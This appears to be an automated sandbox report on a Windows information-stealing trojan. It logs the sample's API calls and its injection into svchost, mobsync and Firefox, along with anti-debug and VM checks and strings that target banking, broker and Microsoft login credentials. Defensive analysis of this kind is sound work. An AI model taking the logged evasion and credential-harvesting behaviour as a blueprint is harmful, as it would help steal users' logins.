Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_00958310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_009651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03787E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03775130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0372B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037AEA12 appears 86 times
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: String function: 00920AE3 appears 70 times
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: String function: 00907DE1 appears 35 times
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: String function: 00928900 appears 42 times
Source: Gz2FxKx2cM.exe, 00000000.00000003.1458695094.0000000003973000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Gz2FxKx2cM.exe
Source: Gz2FxKx2cM.exe, 00000000.00000003.1459168750.0000000003B1D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Gz2FxKx2cM.exe
Source: Gz2FxKx2cM.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@1/1
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_0096A06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_009581CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_009587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_0096B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_0097EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_0096C397 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_00904E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | File created: C:\Users\user\AppData\Local\Temp\aut8F8B.tmp
Source: Gz2FxKx2cM.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mobsync.exe, 00000007.00000003.1863087676.000000000278F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1920673882.00000000027B3000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1920673882.0000000002784000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1860137612.0000000002763000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1860256036.0000000002784000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Gz2FxKx2cM.exe | ReversingLabs: Detection: 71%
Source: Gz2FxKx2cM.exe | Virustotal: Detection: 54%
Source: unknown | Process created: C:\Users\user\Desktop\Gz2FxKx2cM.exe "C:\Users\user\Desktop\Gz2FxKx2cM.exe"
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Gz2FxKx2cM.exe"
Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
Source: C:\Windows\SysWOW64\mobsync.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Gz2FxKx2cM.exe | Static file information: File size 1211904 > 1048576
Source: Gz2FxKx2cM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Gz2FxKx2cM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Gz2FxKx2cM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Gz2FxKx2cM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Gz2FxKx2cM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Gz2FxKx2cM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Gz2FxKx2cM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1643779067.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643880204.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643896188.0000000003031000.00000004.00000020.00020000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675184319.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HFOpYoEqWJkRNv.exe, 00000004.00000002.2673839896.000000000085E000.00000002.00000001.01000000.00000005.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675044855.000000000085E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Gz2FxKx2cM.exe, 00000000.00000003.1459399779.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Gz2FxKx2cM.exe, 00000000.00000003.1458037933.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582627864.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580605438.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.0000000003700000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1683183882.0000000004238000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1681267661.000000000408F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.000000000457E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Gz2FxKx2cM.exe, 00000000.00000003.1459399779.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Gz2FxKx2cM.exe, 00000000.00000003.1458037933.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1677898347.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582627864.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580605438.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.0000000003700000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1683183882.0000000004238000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1681267661.000000000408F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.000000000457E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1643779067.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643880204.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643896188.0000000003031000.00000004.00000020.00020000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675184319.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000007.00000002.1920673882.0000000002709000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921955822.0000000004A0C000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000000.1749658940.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000014C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000007.00000002.1920673882.0000000002709000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921955822.0000000004A0C000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000000.1749658940.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000014C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Gz2FxKx2cM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Gz2FxKx2cM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Gz2FxKx2cM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Gz2FxKx2cM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Gz2FxKx2cM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_00904B37 LoadLibraryA,GetProcAddress, 0_2_00904B37
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_00928945 push ecx; ret 0_2_00928958
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004143C1 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403070 push eax; ret 2_2_00403072
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004120AF push ebp; retf 2_2_004120B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418172 push esi; retf 2_2_0041817D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040AADE push ebp; iretd 2_2_0040AAE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414344 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417C7C push esi; iretd 2_2_00417C7F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413D3D push esp; ret 2_2_00413D3E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040CE68 push ecx; retf 2_2_0040CE6B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx 2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_009048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_009048D7
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_00985376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00985376
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_00923187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00923187
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe API/Special instruction interceptor: Address: 1273484
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-105451
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe TID: 8144 Thread sleep time: -80000s >= -30000s
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_0096445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0096445A
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_0096C6D1 FindFirstFileW,FindClose, 0_2_0096C6D1
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_0096C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0096C75C
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_0096EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0096EF95
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_0096F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0096F0F2
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_0096F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0096F3F3
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_009637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_009637EF
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_00963B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00963B12
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_0096BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0096BCBC
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_009049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_009049A0
                Source: 10O4645j.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 10O4645j.7.dr Binary or memory string: discord.comVMware20,11696494690f
                Source: 10O4645j.7.dr Binary or memory string: AMC password management pageVMware20,11696494690
                Source: 10O4645j.7.dr Binary or memory string: outlook.office.comVMware20,11696494690s
                Source: 10O4645j.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 10O4645j.7.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 10O4645j.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 10O4645j.7.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 10O4645j.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 10O4645j.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 10O4645j.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 10O4645j.7.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 10O4645j.7.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: HFOpYoEqWJkRNv.exe, 00000008.00000002.2675352108.000000000095F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                Source: 10O4645j.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 10O4645j.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 10O4645j.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: mobsync.exe, 00000007.00000002.1920673882.0000000002709000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 10O4645j.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: 10O4645j.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 10O4645j.7.dr Binary or memory string: tasks.office.comVMware20,11696494690o
                Source: 10O4645j.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 10O4645j.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 10O4645j.7.dr Binary or memory string: dev.azure.comVMware20,11696494690j
                Source: 10O4645j.7.dr Binary or memory string: global block list test formVMware20,11696494690
                Source: 10O4645j.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 10O4645j.7.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 10O4645j.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 10O4645j.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 10O4645j.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 10O4645j.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 10O4645j.7.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: Gz2FxKx2cM.exe, 00000000.00000002.1460162657.000000000118B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareworkstation.exe
                Source: 10O4645j.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe API call chain: ExitProcess graph end node graph_0-104641
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\mobsync.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\mobsync.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417543 LdrLoadDll, 2_2_00417543
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_00973F09 BlockInput, 0_2_00973F09
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_00903B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00903B3A
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_00935A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00935A7C
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_00904B37 LoadLibraryA,GetProcAddress, 0_2_00904B37
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_012720A0 mov eax, dword ptr fs:[00000030h] 0_2_012720A0
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_01273750 mov eax, dword ptr fs:[00000030h] 0_2_01273750
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe Code function: 0_2_012736F0 mov eax, dword ptr fs:[00000030h] 0_2_012736F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h] 2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h] 2_2_037FA352
